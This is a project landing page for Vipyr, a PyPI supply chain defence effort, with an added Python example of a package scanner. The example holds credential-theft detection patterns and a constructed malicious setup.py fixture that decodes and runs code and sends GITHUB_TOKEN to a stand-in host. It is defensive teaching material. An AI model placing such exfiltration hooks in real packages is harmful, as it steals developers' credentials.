Open source supply chain defense

Removing malware from package ecosystems.

Vipyr runs public systems for package intake, distributed scanning, malicious package reporting, and supply chain research so suspicious releases can move from feed activity to actionable review.

4.1M packages scanned
2044 malicious packages removed
150+ detection signatures
16 contributors

Detection to takedown

Coverage: 24/7

Continuous package scanning and incident review for emerging supply chain abuse.

Response: about 10 minutes

Confirmed malicious packages that Vipyr reports are usually actioned in about 10 minutes, not days or months.

Operating sequence

Observe, triage, remediate, publish

PyPI RSS loader: queued
Mainframe job dispatch: assigned
Client scan results: returned
Reporter + analyst review: actioned
Why Vipyr exists

Modern package security needs both automation and human judgment.

Package ecosystems move fast, but useful security work still depends on understandable workflows. Vipyr couples automated intake and scanning systems with review, reporting, and public research.

Observe package ecosystems

Vipyr uses automated intake of package activity (such as the PyPI release feed) so new releases are loaded into the Dragonfly workflow and reviewed before they disappear into the stream.

Investigate malicious artifacts

Dragonfly clients request work from the API, download distributions, scan package files, and return results in a form that can be reviewed and acted on.

Coordinate remediation

Queue, reporting, and recent-activity flows exist across Dragonfly services so detections can move toward package reports and writeups.
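The three stages above in miniature, as an added example that is not Dragonfly's own code: a feed parser turns feed items into work, a scanner runs signatures over downloaded distributions, and a triage step ranks the results for review. The feed sample, the in-memory archives, the regex rules and the review threshold are all constructed for this example; the real client retrieves rule content from the server, and the page does not describe that rule format.

```python
"""Feed -> queue -> scan -> triage, in the shape the page describes.
Added example; not Vipyr's or Dragonfly's code."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Constructed sample in the shape of the PyPI updates feed (the live feed is
# https://pypi.org/rss/updates.xml; item titles there read "<name> <version>").
# Both package names are fictional.
SAMPLE_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel>
<item><title>example-clean 1.2.0</title></item>
<item><title>totally-safe-helper 0.0.3</title></item>
</channel></rss>"""

# Hypothetical stand-in signatures: (name, pattern, weight, setup.py only).
# Dragonfly clients fetch real rule content from the server; these regexes
# exist only to show weighted matching over archive members.
RULES = [
    ("exec_in_setup", re.compile(rb"\b(exec|eval)\s*\("), 3, True),
    ("base64_decode", re.compile(rb"base64\.b64decode\("), 2, False),
    ("remote_fetch_in_setup", re.compile(rb"urllib\.request\.urlopen\(|requests\.get\("), 3, True),
    ("credential_env_read", re.compile(rb"AWS_SECRET_ACCESS_KEY|GITHUB_TOKEN|\.aws/credentials"), 4, False),
]
REVIEW_THRESHOLD = 5  # hypothetical cutoff for routing a package to analyst review


def parse_feed(xml_text: str) -> list[tuple[str, str]]:
    """Turn feed items into (name, version) work items, like the RSS loader stage."""
    root = ET.fromstring(xml_text)
    jobs = []
    for item in root.iter("item"):
        name, version = item.findtext("title").rsplit(" ", 1)
        jobs.append((name, version))
    return jobs


def build_sdist(files: dict[str, str]) -> bytes:
    """Constructed in-memory zip standing in for a downloaded distribution."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for path, text in files.items():
            zf.writestr(path, text)
    return buf.getvalue()


@dataclass
class ScanResult:
    name: str
    version: str
    score: int = 0
    matches: dict[str, list[str]] = field(default_factory=dict)  # rule -> member paths

    @property
    def needs_review(self) -> bool:
        return self.score >= REVIEW_THRESHOLD


def scan_distribution(name: str, version: str, archive: bytes) -> ScanResult:
    """Scan every archive member against the rules (the client scan stage).
    Member bytes are only pattern-matched, never executed."""
    result = ScanResult(name, version)
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for member in zf.namelist():
            data = zf.read(member)
            is_setup = member.endswith("setup.py")
            for rule_name, pattern, weight, setup_only in RULES:
                if setup_only and not is_setup:
                    continue
                if pattern.search(data):
                    hits = result.matches.setdefault(rule_name, [])
                    if not hits:  # a rule's weight counts once per package, however many files hit
                        result.score += weight
                    hits.append(member)
    return result


def run_pipeline(feed_xml: str, archives: dict[str, bytes]) -> list[ScanResult]:
    """Queue every feed item, scan the ones we could fetch, rank by score for triage.
    Jobs with no fetched distribution are skipped here; a real queue would retry them."""
    results = []
    for name, version in parse_feed(feed_xml):
        archive = archives.get(name)
        if archive is None:
            continue
        results.append(scan_distribution(name, version, archive))
    return sorted(results, key=lambda r: r.score, reverse=True)


# Constructed distributions for the two feed items above.
ARCHIVES = {
    "example-clean": build_sdist({
        "example_clean/__init__.py": "def add(a, b):\n    return a + b\n",
        "setup.py": "from setuptools import setup\nsetup(name='example-clean')\n",
    }),
    "totally-safe-helper": build_sdist({
        "setup.py": (
            "import base64, os, urllib.request\n"
            "exec(base64.b64decode('...'))\n"
            "urllib.request.urlopen('http://example.invalid/c?t=' + os.environ.get('GITHUB_TOKEN', ''))\n"
        ),
    }),
}

if __name__ == "__main__":
    for r in run_pipeline(SAMPLE_FEED, ARCHIVES):
        verdict = "REVIEW" if r.needs_review else "clear"
        print(f"{r.name} {r.version}: score={r.score} {verdict} {sorted(r.matches)}")
```

Scoring each rule once per package rather than once per file keeps a single noisy pattern from dominating the ranking, which matters when the queue is ordered by score before a human looks at it.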

Public defense

Package malware doesn't just hit security teams.

Students, teachers, developers, maintainers, and businesses all depend on package managers they do not have time to treat like a daily threat surface. One typo can be enough. Vipyr operates to catch that abuse without asking those users to install an agent, buy a product, or change how they work.

Built to intervene before the victim knows there is a problem

Vipyr monitors package activity, scans suspicious releases, coordinates reports with ecosystem administrators, and publishes what is learned. The protection is free, and the only meaningful user involvement is the community work that helps improve the tooling and research.

Students and teachers

A single typo during coursework, classroom setup, or lab work can turn a routine install into credential theft or device compromise.

Developers and operators

Typos such as `pip install requestss`, or the same slip in a `uv` command, can pull in a malicious package before anyone notices the mistake.

Businesses and communities

One package can expose local secrets, cloud credentials, or customer data. Vipyr exists to reduce that blast radius before it spreads.

Dragonfly

A distributed malware analysis workflow built for package ecosystem response.

Dragonfly is the operating backbone behind Vipyr’s package analysis workflows. It spans automated intake, job distribution, compute-node scanning, reporting services, and analyst review.

Dragonfly Server

Mainframe service responsible for job distribution, result intake, and the API surface behind package lookup, queue handling, and reporting flows.

Dragonfly Client

Rust compute node that authenticates, retrieves rule content, downloads package distributions, scans files, and sends package results back upstream.

Dragonfly Bot

Discord-facing triage surface that keeps community review close to the operating workflow instead of isolating it in a separate channel.

Research

Analysis from live package ecosystem abuse.

Research is where Vipyr turns detections, reverse engineering, and ecosystem anomalies into work other defenders can inspect and reuse.


Explore the research, inspect the tooling, and stay close to the signal.

Follow the workflow from technical writeups to the systems behind them. The same public repos that support intake, scanning, queue handling, reporting, and focused triage also make Vipyr Security easier to understand from the outside.